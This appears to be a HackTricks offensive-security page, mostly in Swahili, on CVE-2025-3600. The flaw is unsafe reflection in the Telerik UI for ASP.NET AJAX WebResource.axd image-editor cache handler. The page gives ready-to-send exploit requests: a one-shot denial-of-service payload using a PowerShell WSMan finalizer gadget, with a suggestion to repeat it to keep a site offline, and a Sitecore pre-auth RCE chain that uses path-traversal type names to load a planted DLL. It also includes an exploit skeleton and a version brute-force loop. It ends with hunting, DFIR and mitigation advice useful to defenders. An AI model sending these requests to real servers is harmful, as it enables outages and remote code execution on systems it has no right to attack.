Telerik UI for ASP.NET AJAX – Unsafe Reflection via WebResource.axd (type=iec)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).

Support HackTricks

Utekelezaji wa constructor kabla ya uthibitisho (Pre‑auth) katika Telerik UI for ASP.NET AJAX Image Editor cache handler unaruhusu universal DoS na, katika programu nyingi, pre‑auth RCE kupitia target‑specific gadgets (CVE-2025-3600).

TL;DR

  • Affected component/route: Telerik.Web.UI.WebResource.axd with query type=iec (Image Editor cache handler). Exposed pre‑auth in many products.
  • Primitive: Mshambuliaji anasimamia jina la type (prtype). The handler resolves it with Type.GetType() and invokes Activator.CreateInstance() before verifying interface type-safety. Any public parameterless .NET type constructor will run.
  • Impact:
    • Universal pre‑auth DoS with a .NET framework gadget (PowerShell WSMan finalizer).
    • Often elevates to pre‑auth RCE in real deployments by abusing app‑specific gadgets, especially insecure AppDomain.AssemblyResolve handlers.
  • Fix: Update to Telerik UI for ASP.NET AJAX 2025.1.416+ or remove/lock the handler.

Affected versions

  • Telerik UI for ASP.NET AJAX versions 2011.2.712 through 2025.1.218 (inclusive) are vulnerable.
  • Fixed in 2025.1.416 (released 2025-04-29). Patch immediately or remove/lock down the handler.

Affected surface and quick discovery

  • Kagua ufichuzi:
    • GET /Telerik.Web.UI.WebResource.axd should return something other than 404/403 if the handler is wired.
    • Inspect web.config for handlers mapping to Telerik.Web.UI.WebResource.axd.
    • Do not rely on finding Telerik strings on / or login pages. Real products such as Sitecore often expose the handler without referencing it in the default HTML.
  • Trigger path for the vulnerable code-path requires: type=iec, dkey=1, and prtype=.

Example probe and generic trigger:

GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=Namespace.Type, Assembly

Vidokezo

  • Baadhi ya PoCs hutumia dtype; utekelezaji unakagua dkey==“1” kwa download flow.
  • prtype lazima iwe assembly-qualified au iweze kutatuliwa katika AppDomain ya sasa.

Mikaguzi muhimu ya code/ops

<!-- system.web -->
<add path="Telerik.Web.UI.WebResource.axd" type="Telerik.Web.UI.WebResource" verb="*" validate="false" />

<!-- system.webServer -->
<add name="Telerik_Web_UI_WebResource_axd" path="Telerik.Web.UI.WebResource.axd" type="Telerik.Web.UI.WebResource" verb="*" preCondition="integratedMode" />

rg -n 'Telerik\.Web\.UI\.WebResource\.axd|Telerik\.Web\.UI\.WebResource' web.config **/*.config
curl -skI https://target/Telerik.Web.UI.WebResource.axd
curl -sk 'https://target/Telerik.Web.UI.WebResource.axd?type=iec'

Triage ya haraka ya toleo kwenye usakinishaji wa zamani

Kama programu hiyo hiyo pia inaonyesha handler ya urithi type=rau, zana za zamani za Telerik bado zinaweza kukusaidia kubainisha toleo la pamoja la Telerik.Web.UI.dll kabla ya kujaribu utafiti wa type=iec. Hii si exploit CVE-2025-3600 moja kwa moja; inatumia tu ukweli kwamba rau na iec zipo katika assembly ile ile.

Matumizi ya vitendo:

  • Kama type=rau inapatikana, tumia brute-force ya toleo kuu ya jadi kutoka zana za zamani za RAU ili kupata toleo halisi la assembly Telerik.Web.UI.
  • Linganisha toleo lililopatikana dhidi ya safu hatarishi (2011.2.712 hadi 2025.1.218) na build iliyorekebishwa (2025.1.416+).
  • Chukulia kutokuwepo kwa type=rau kama kutokuwa na hitimisho. iec bado inaweza kuonekana hata wakati rau imezimwa au imechujwa.

Mfano na chombo cha kale CVE-2019-18935.py:

for YEAR in $(seq 2011 2025); do
echo -n "$YEAR: "
python3 CVE-2019-18935.py -t -v "$YEAR" -p /dev/null \
-u 'https://target/Telerik.Web.UI.WebResource.axd?type=rau' 2>/dev/null |
grep -oE "Telerik.Web.UI, Version=$YEAR\\.[0-9\\.]+" || echo
done

Kwa nini hili linasaidia:

  • Programu za kampuni mara nyingi hujumuisha matoleo ya Telerik yaliyokaa kwa miaka.
  • Red teams zinaweza kutofautisha haraka “handler exposed” kutoka “likely still on a vulnerable DLL”.
  • Wakati wa incident response, njia ile ile husaidia kutambua wigo wa makundi makubwa ya IIS wakati ufikiaji wa mfumo wa faili haupatikani mara moja.

Sababu ya msingi – unsafe reflection katika ImageEditorCacheHandler

Mtiririko wa kupakua cache wa Image Editor huunda mfano wa aina iliyotolewa katika prtype na baadaye tu huibadilisha kuwa ICacheImageProvider na kuthibitisha ufunguo wa kupakua. Constructor tayari imekwisha tekelezwa wakati uthibitisho unashindwa.

Mtiririko uliodecompiled unaohusiana ```csharp // entrypoint public void ProcessRequest(HttpContext context) { string text = context.Request["dkey"]; // dkey string text2 = context.Request.Form["encryptedDownloadKey"]; // download key ... if (this.IsDownloadedFromImageProvider(text)) // effectively dkey == "1" { ICacheImageProvider imageProvider = this.GetImageProvider(context); // instantiation happens here string key = context.Request["key"]; if (text == "1" && !this.IsValidDownloadKey(text2)) { this.CompleteAsBadRequest(context.ApplicationInstance); return; // cast/check happens after ctor has already run } using (EditableImage editableImage = imageProvider.Retrieve(key)) { this.SendImage(editableImage, context, text, fileName); } } }

private ICacheImageProvider GetImageProvider(HttpContext context) { if (!string.IsNullOrEmpty(context.Request[“prtype”])) { return RadImageEditor.InitCacheImageProvider( RadImageEditor.GetICacheImageProviderType(context.Request[“prtype”]) // [A] ); } … }

public static Type GetICacheImageProviderType(string imageProviderTypeName) { return Type.GetType(string.IsNullOrEmpty(imageProviderTypeName) ? typeof(CacheImageProvider).FullName : imageProviderTypeName); // [B] }

protected internal static ICacheImageProvider InitCacheImageProvider(Type t) { // unsafe: construct before enforcing interface type-safety return (ICacheImageProvider)Activator.CreateInstance(t); // [C] }

</details>

Exploit primitive: string ya aina iliyodhibitiwa → Type.GetType inalitatua → Activator.CreateInstance inaendesha constructor yake ya umma isiyo na vigezo. Hata kama ombi litatupwa baadaye, madhara ya upande wa gadget tayari yametokea.

## Gadget ya Universal DoS (hakuna app-specific gadgets zinazohitajika)

Class: System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper in System.Management.Automation (PowerShell) ina finalizer inayofuta handle isiyoanzishwa, ikisababisha unhandled exception wakati GC inapomaliza. Hii kwa uhakika inasababisha mchakato wa worker wa IIS kuanguka muda mfupi baada ya kuundwa.

One‑shot DoS request:
```http
GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper,+System.Management.Automation,+Version%3d3.0.0.0,+Culture%3dneutral,+PublicKeyToken%3d31bf3856ad364e35

Notes

  • Endelea kutuma mara kwa mara ili kuweka site offline. Unaweza kuona constructor ikipigwa kwenye debugger; crash hutokea wakati wa finalization.

Kutoka DoS hadi RCE – mifumo ya kupandisha hadhi

Unsafe constructor execution hufungua gadgets na chains nyingi maalum kwa lengo. Tafuta:

  1. Parameterless constructors that process attacker input
  • Baadhi ya ctors (au static initializers) husoma mara moja Request query/body/cookies/headers na hu-(de)serialize.
  • Mfano (Sitecore): a ctor chain reaches GetLayoutDefinition() ambayo husoma HTTP body “layout” na hu-deserialize JSON via JSON.NET.
  1. Constructors that touch files
  • Ctros that load or deserialize config/blobs from disk zinaweza kulazimishwa ikiwa unaweza kuandika kwenye paths hizo (uploads/temp/data folders).
  1. Constructors performing app-specific ops
  • Kurejesha state, kubadilisha modules, au kumaliza processes.
  1. Constructors/static ctors that register AppDomain event handlers
  • Many apps add AppDomain.CurrentDomain.AssemblyResolve handlers that build DLL paths from args.Name without sanitization. Ikiwa unaweza kuathiri type resolution unaweza kulazimisha arbitrary DLL loads kutoka attacker‑controlled paths.
  1. Forcing AssemblyResolve via Type.GetType
  • Ombi la type isiyo yawepo ili kusababisha CLR resolution na kuita registered (pengine insecure) resolvers. Example assembly-qualified name:
This.Class.Does.Not.Exist, watchTowr
  1. Finalizers zenye athari za uharibifu
  • Baadhi ya types hufuta fixed-path files ndani ya finalizers. Ikiunganishwa na link-following au predictable paths, hii inaweza kuwezesha local privilege escalation katika mazingira fulani.

Mfano wa pre‑auth RCE chain (Sitecore XP)

  • Step 1 – Pre‑auth: Chochea type ambayo static/instance ctor inasajili insecure AssemblyResolve handler (e.g., Sitecore’s FolderControlSource in ControlFactory).
  • Step 2 – Post‑auth: Pata uwezo wa kuandika kwenye resolver-probed directory (e.g., kupitia auth bypass au weak upload) na weka malicious DLL.
  • Step 3 – Pre‑auth: Tumia CVE‑2025‑3600 na type isiyokuwepo na jina la assembly lenye traversal ili kulazimisha resolver i-load DLL uliopanda → code execution as the IIS worker.

Mifano za kuchochea

# Load the insecure resolver (no auth on many setups)
GET /-/xaml/Sitecore.Shell.Xaml.WebControl

# Coerce the resolver via Telerik unsafe reflection
GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=watchTowr.poc,+../../../../../../../../../watchTowr

Uthibitishaji, hunting na vidokezo za DFIR

  • Uthibitishaji wa maabara salama: Tuma DoS payload na tazama kuanzishwa upya kwa app pool / unhandled exception inayohusishwa na WSMan finalizer.
  • Kutafuta katika telemetry:
  • Maombi kwa /Telerik.Web.UI.WebResource.axd with type=iec and odd prtype values.
  • Failed type loads na AppDomain.AssemblyResolve events.
  • Kugongana/kuanzishwa upya kwa w3wp.exe kwa ghafla kufuatia maombi kama hayo.

Kupunguza

  • Sakinisha patch ya Telerik UI for ASP.NET AJAX 2025.1.416 au baadaye.
  • Ondoa au punguza ufichaji wa Telerik.Web.UI.WebResource.axd pale inapowezekana (WAF/rewrites).
  • Puuza au imarisha utunzaji wa prtype upande wa server (sasisha ili kutumia ukaguzi sahihi kabla ya kuunda instance).
  • Kagua na imarisha handlers maalum za AppDomain.AssemblyResolve. Epuka kujenga paths kutoka args.Name bila kusafishwa; tumia upakiaji wa strong-named au whitelist.
  • Zuia na punguza maeneo ya upload/write na zuia kuangushwa kwa DLL katika directories zinazochunguzwa.
  • Fuatilia jaribio za kupakia type zisizopo ili kugundua matumizi mabaya ya resolver.

Mwongozo mfupi

  • Ukaguzi wa uwepo:
  • GET /Telerik.Web.UI.WebResource.axd
  • Angalia handler mapping katika web.config
  • Exploit skeleton:
GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=<TypeName,+Assembly,+Version=..., +PublicKeyToken=...>
  • DoS ya Ulimwengu:
...&prtype=System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper,+System.Management.Automation,+Version%3d3.0.0.0,+Culture%3dneutral,+PublicKeyToken%3d31bf3856ad364e35
  • Mtatua wa trigger:
This.Class.Does.Not.Exist, watchTowr

Mbinu zinazohusiana

  • IIS post-exploitation, .NET key extraction, na in‑memory loaders:

IIS - Internet Information Services

  • ASP.NET ViewState deserialization na machineKey abuses:

Exploiting __VIEWSTATE without knowing the secrets

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).

Support HackTricks